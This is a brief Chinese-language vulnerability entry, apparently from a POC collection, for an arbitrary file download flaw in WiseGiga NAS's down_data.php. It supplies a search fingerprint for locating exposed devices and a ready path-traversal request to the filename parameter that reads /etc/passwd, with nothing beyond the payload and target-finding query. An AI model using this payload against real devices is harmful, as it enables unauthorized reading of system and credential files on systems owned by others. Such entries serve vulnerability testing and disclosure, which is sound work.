WISEGIGA NAS down_data.php 存在任意文件下载漏洞,由于 /down_data.php 页面 filename 参数过滤不严,导致可以读取系统敏感文件。
WiseGiga NAS
app="WISEGIGA-NAS"
主页面
验证POC
/down_data.php?filename=../../../../../../../../../../../../../../etc/passwd
